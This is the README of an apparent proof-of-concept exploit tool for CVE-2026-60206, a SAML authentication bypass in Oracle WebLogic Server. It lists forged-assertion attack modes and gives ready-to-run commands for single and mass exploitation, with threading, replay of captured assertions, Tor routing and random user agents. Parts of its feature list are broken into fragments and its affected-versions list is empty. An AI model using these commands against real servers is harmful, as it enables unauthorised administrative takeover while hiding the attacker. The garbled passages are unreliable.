
Technische Analyse und Proof-of-Concept für CVE-2026-60206, eine kritische Schwachstelle zur Umgehung der SAML-Authentifizierung im Oracle WebLogic Server.
Dieses Repository bietet einen Proof-of-Concept-Exploit für CVE‑2026‑60206, eine kritische Schwachstelle zur Umgehung der Authentifizierung in der SAML-Implementierung von Oracle WebLogic Server. Der Fehler ermöglicht es einem entfernten Angreifer mit geringen Rechten, den Server durch das Fälschen von SAML-Assertions vollständig zu kompromittieren.
⚠️ Haftungsausschluss: Dieses Tool ist ausschließlich für autorisierte Sicherheitsforschung und -tests bestimmt. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für deren Test Sie eine ausdrückliche Genehmigung haben. Die Autoren übernehmen keine Haftung für Missbrauch.
CVE-2026-60206 betrifft die Core-Komponente von Oracle WebLogic Server. Die Schwachstelle resultiert aus einer fehlerhaften Authentifizierungsbehandlung in der SAML-Protokollimplementierung. Mehrere Angriffsvektoren – wie XML-Signatur-Wrapping (XSW), die Akzeptanz unsignierter Assertions, NameID-Manipulation und die Umgehung von Audience-/Conditions-Prüfungen – ermöglichen es einem Angreifer, sich als beliebige Benutzer auszugeben (z. B. weblogic) und administrativen Zugriff zu erlangen.
Betroffene Versionen:
Der PoC implementiert die folgenden Angriffsvektoren:
WantAssertionsSigned nicht erzwungen wird).AudienceRestriction, um den Geltungsbereich zu erweitern.NotBefore/NotOnOrAfter, um Gültigkeitsprüfungen zu umgehen.all, unsigned, xsw, nameid, audience, conditions, combo oder replay.-l).-r).httpx, falls installiert, andernfalls requests (HTTP/1.1).--save-payloads).-c / --check) – schnelle Ermittlung, ob ein Ziel verwundbar ist (kein Exploit).git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt
Erforderlich: requests, urllib3
Optional (erweitert die Funktionalität):
httpx – für HTTP/2-Unterstützunglxml – für verbessertes SAML-Parsingsignxml, cryptography – für die Signaturverarbeitung (für die Ausnutzung nicht erforderlich)python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin
python CVE-2026-60206.py -l targets.txt -o results.json
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c
| Flag | Beschreibung |
|---|---|
-h, --help | Hilfemeldung anzeigen und beenden. |
--proxy PROXY | Proxy-URL (wird durch --tor überschrieben, falls verwendet). |
--no-verify | SSL-Zertifikatsprüfung deaktivieren. |
--cookie COOKIE | Session-Cookie(s) (z. B. name=value; name2=value2). |
--auth AUTH | Anmeldedaten für die Basis-Authentifizierung (USER:PASS). |
| Flag | Beschreibung |
|---|---|
-t, --target TARGET | URL eines einzelnen Ziels (z. B. https://host:7002). |
-l, --list LIST | Datei mit Zielliste für den Massen-Scan oder einzelne URL. |
-f, --file FILE | Alias für --list. |
| Flag | Beschreibung |
|---|---|
-r, --requestfile REQUESTFILE | Rohe HTTP-Anfrage aus Datei laden (ersetzt SAML-Angriffe). |
--method METHOD | Zu verwendende HTTP-Methode (für rohe Anfrage oder einzelne Anfrage; Standard: GET). |
--random-agent | Einen zufälligen User-Agent aus der integrierten Liste verwenden. |
-A, --user-agent USER_AGENT | Benutzerdefinierter User-Agent-Header-Wert. |
--tor | Tor-Anonymitätsnetzwerk verwenden (standardmäßig SOCKS5). |
--tor-port TOR_PORT | Tor-Proxy-Port (Standard: 9050). |
--tor-type {HTTP,SOCKS4,SOCKS5} | Tor-Proxy-Typ (Standard: SOCKS5). |
--check-tor | Prüfen, ob Tor ordnungsgemäß verwendet wird (beendet mit Ergebnis). |
--delay DELAY | Verzögerung in Sekunden zwischen den einzelnen Anfragen. |
--timeout TIMEOUT | Timeout in Sekunden (Standard: 30). |
--retries RETRIES | Anzahl der Wiederholungen bei Timeout/Fehlern (Standard: 3). |
--retry-on RETRY_ON | Anfrage wiederholen, wenn der Antwortinhalt auf einen Regex passt (z. B. 'captcha'). |
-dr, --disable-redirects | HTTP-Umleitungen nicht verfolgen. |